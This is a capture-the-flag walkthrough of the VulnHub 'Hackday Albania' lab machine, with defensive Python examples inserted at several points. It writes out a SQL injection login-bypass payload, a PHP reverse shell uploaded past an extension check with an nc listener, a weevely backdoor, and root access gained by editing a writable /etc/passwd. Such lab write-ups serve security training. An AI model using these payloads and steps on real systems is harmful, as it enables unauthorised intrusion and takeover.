Vulnhub Hackday Albania

Enumeration

As always, we start the game off with a general nmap scan.

nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131

Only two ports appear to be open: 22 and 8008, the latter running Apache 2.4.18.

Apache

Let's investigate the website.
Our nmap scan showed that there's a robots.txt.
When we open the website, there's a window saying

-> Ne qofte se jam UNE, e di se ku te shkoj ;)

Using Google Translate we end up with

-> If I am UNE, I know where to go;)

It doesn’t tell us much.

Source code

Looking at the source code, we notice a comment near the end of the page saying

O ok, por jo ketu :)

That translates to

Ok ok, but not here :)

Once again we’re not getting much.

Let’s switch to the robots.txt

Robots.txt

If we open 192.168.1.149:8008/robots.txt, we see this text

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

If we append one of these lines to the URL, we get an image.
Since there are a lot of lines, we'll write a script to crawl through each path and download whatever is inside. By doing a simple curl through all the folders I found one that had a message
instead of an image.
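The crawl above starts from robots.txt, which is a public file: every Disallow line tells a visitor exactly which paths the operator wanted kept out of search engines. The parser below, added here as an example and not part of the original write-up, handles User-agent groups, comments and Allow/Disallow rules and turns the Disallow entries into absolute URLs; SAMPLE_ROBOTS is a constructed excerpt of the file shown above.

```python
from urllib.parse import urljoin

# Constructed excerpt in the shape of the robots.txt above: a User-agent line,
# a comment, three of the Disallow entries and one Allow rule.
SAMPLE_ROBOTS = """\
# constructed sample
User-agent: *
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /unisxcudkqjydw/
Allow: /index.html
"""


def parse_robots(text):
    """Parse robots.txt into {agent: {"allow": [...], "disallow": [...]}}.

    A group is one or more consecutive User-agent lines followed by rules;
    rules that appear before any User-agent line are attached to '*'.
    """
    groups = {}
    current = []            # agents the following rules apply to
    in_agent_block = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not in_agent_block:            # a new group starts here
                current = []
            current.append(value)
            groups.setdefault(value, {"allow": [], "disallow": []})
            in_agent_block = True
        elif field in ("allow", "disallow"):
            in_agent_block = False
            if not current:                   # rules with no preceding group
                current = ["*"]
                groups.setdefault("*", {"allow": [], "disallow": []})
            for agent in current:
                groups[agent][field].append(value)
    return groups


def disallowed_urls(base, text, agent="*"):
    """Absolute URLs the file asks the given agent not to visit."""
    rules = parse_robots(text).get(agent, {"disallow": []})
    return [urljoin(base, path) for path in rules["disallow"]]
```

The listing in the write-up shows only Disallow lines, so the parser attaches rules with no preceding User-agent line to `*` rather than dropping them; the lesson for the site owner is that robots.txt is a hint to well-behaved crawlers, not an access control.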

IS there any /vulnbank/ in there ???

I tried 192.168.1.149:8008/vulnbank/ but it didn't work.
I then tried to append it to the page where I found the message

http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/

We're getting somewhere: we got a directory listing with a client folder that
leads into a "Very secure bank".

SQLi

We get a username and password input box; it looks like we're going to need to SQL inject our way through.
After trying for more than an hour I decided to use Burp Intruder to do the job.

Using Burp Intruder and a list found on this GitHub -> https://github.com/1N3/IntruderPayloads, we found one winning combination out of 240 tries.

' OR 'p'='p' #;

bypasses the login.
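Why that payload works, and what stops it, as an added example (not code from the write-up or the target application): the login presumably builds its query by string concatenation, so the quote in the password closes the literal and `OR 'p'='p'` makes the WHERE clause true for every row. The same query with bound parameters treats the whole string as data. The example uses an in-memory SQLite table standing in for the bank's database; because SQLite has no `#` comment syntax, PAYLOAD is the write-up's payload without its trailing MySQL comment marker, which here is unnecessary since the query's own closing quote finishes the injected literal.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the bank's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse-battery')")
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: the user's input becomes part of the SQL text."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username, password):
    """Bound parameters: the driver passes the input as data, so a quote in it
    can never close the string literal or append an OR clause."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The write-up's payload minus the trailing MySQL comment marker (SQLite has no
# '#' comments); the query's own closing quote terminates the injected 'p'.
PAYLOAD = "' OR 'p'='p"
```

With the payload as password and any username, `login_vulnerable` returns the first user in the table because `AND` binds tighter than `OR`, so the condition reads `(username=... AND password='') OR 'p'='p'`; `login_parameterised` returns nothing for the same input.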

Account

We're inside the account and there's an upload button.
We're going to try to upload a PHP reverse shell.

On our first try, we see that the website verifies the extension of the file.
On the second try we just rename it to .jpg and it goes through.

I'll set up nc to listen for the incoming connection

nc -lv 1234

We load the page and boom! We got a reverse shell.
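The upload check that was bypassed only looked at the client-supplied file name. The example below, added here and not taken from the write-up or the target site, puts that weak check next to a validator that also requires the content to start with the declared image type's magic bytes and to contain no PHP open tag, and that lets the server choose the stored name. The sample byte strings are constructed; the PHP one is a harmless placeholder, not the shell from the write-up.

```python
import secrets

ALLOWED = {"jpg", "jpeg", "png", "gif"}

# Leading bytes each accepted image type must start with (checked against the
# content, not against the name the client chose).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def extension_only_check(filename):
    """The weak check the write-up hit: only the client-chosen name is inspected,
    so renaming shell.php to shell.jpg passes."""
    return extension_of(filename) in ALLOWED


def validate_upload(filename, data):
    """Return (accepted, reason). Requires an allowlisted extension AND content
    starting with that type's magic bytes AND no PHP open tag anywhere."""
    ext = extension_of(filename)
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if b"<?php" in data or b"<?=" in data:
        return False, "PHP open tag embedded in image"
    return True, "ok"


def server_side_name(ext):
    """Name the stored file ourselves: random, with a single fixed extension."""
    return secrets.token_hex(16) + "." + ext


# Constructed samples.
RENAMED_PHP = b"<?php /* constructed placeholder */ ?>"
REAL_JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
POLYGLOT = REAL_JPEG_HEAD + b"<?php /* constructed placeholder */ ?>"
```

The tag scan catches the polyglot case (a valid JPEG header with PHP appended), but content inspection is defence in depth: the decisive fix is that the web server must never hand files in the upload directory to the PHP interpreter, for example by disabling the PHP engine for that directory.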

Privilege Escalation

We’re inside the system, now we need to get to root.
First things first.

uname -a

linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64
x86_64 x86_64 GNU/Linux

We're dealing with kernel 4.4.0; could this still be vulnerable to Dirty COW? And... nope.

Let’s see which OS it’s running

cat /etc/lsb-re*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"

We got something pretty recent.

Enumeration

After spending a couple of hours looking at the services and libraries, I was
still not able to elevate my privileges.

I tried a bunch of exploits that either crashed the machine or did nothing.
Only having a reverse shell was quite annoying because you couldn't go back to get a command you typed a while ago.

So after googling a bit I found weevely. What a beautiful tool.
It lets us create a backdoor in PHP and upload it directly to the server.

Weevely

We need to create the backdoor.

weevely generate toor me.php

This will create the backdoor with the password toor.

Once that is done we've got to upload it to a folder we can access from outside.
In our case we need to put the file in the same directory where we uploaded our
jpg in the previous steps.

By doing a quick find on the jpg file that we uploaded we see that the
directory is /var/www/html/unisxcudkqjydw/vulnbank/client/upload

We can either wget the file directly from the Kali machine, hosting an
HTTP server with python -m SimpleHTTPServer, or use nc, or one of the
many other ways available.

Once the backdoor is in, we can go back to our Kali machine and use the following command to establish the connection

weevely http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/client/upload/me.php toor

Where me.php is the backdoor and toor is the password.

We now have a shell with more functions than the basic reverse shell.

Weevely is love

Weevely has a bunch of commands that do things for us; :help will show them.
In our case one command will show us a way to obtain root.

:audit_filesystem

If we look at the result we can see that in the /etc/ folder the file passwd is writable. There's our door.

Weevely is life

In our simple reverse shell we couldn’t use vim correctly. Weevely fixes that.
What we need to do is change the password of the users that we want.

In our previous enumeration I noticed that the home directory of the user
taviso contained the file sudo_as_admin_successful.

That means that he has sudo rights as admin. So I'll be changing the password
of taviso to whatever I want.

We can replace the second field in passwd with a password, but it needs to be in crypt(3) hashed form. Perl will let us generate the hashed password

perl -le 'print crypt("foo", "aa")'
aaKNIEDOaueR6

Where foo is the new password.

We edit the /etc/passwd file

vi /etc/passwd

taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash

I tried using su to switch user but it was not available. Let’s just try to ssh into the machine directly.
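Seen from the defender's side, the edit above leaves two traces: /etc/passwd is writable by someone other than root, and an entry carries a hash in its second field where a shadow-enabled system should only have the marker `x`. The audit below, added here and not part of the write-up, checks both; SAMPLE_PASSWD is a constructed file in /etc/passwd format whose taviso line mirrors the edit, with an extra line showing an empty password field.

```python
import os
import stat

# Constructed sample in /etc/passwd format. The taviso line mirrors the edit
# made above; the backup line has an empty password field (an empty password).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash
backup::34:34:backup:/var/backups:/usr/sbin/nologin
"""


def audit_passwd_entries(text):
    """Return (line, user, finding) for entries that bypass /etc/shadow.

    On a shadow-enabled system the second field should be the marker 'x'
    (or a lock marker); a hash there is checked directly by crypt(3), and an
    empty field is an empty password.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append((lineno, name, "hash stored in passwd instead of shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "extra uid 0 account"))
    return findings


def group_or_world_writable(mode):
    """True if the permission bits allow group or other write, which is the
    condition weevely's :audit_filesystem reported for /etc/passwd."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file on the host."""
    with open(path) as fh:
        findings = audit_passwd_entries(fh.read())
    if group_or_world_writable(os.stat(path).st_mode):
        findings.append((0, path, "file writable by group or others"))
    return findings
```

Running `audit_passwd_file()` on the box described here would report the writable file and the taviso entry; on a healthy Ubuntu 16.04 host the mode is 0644 and every entry's password field is `x`, so the list comes back empty.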

SSH

We can ssh directly as taviso

And we’re in!

Let’s see our sudo rights

sudo -l

Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

(ALL : ALL) ALL, that's good game.
We got all the rights.

sudo passwd root

su root

Changing the root password and switching to it.

GG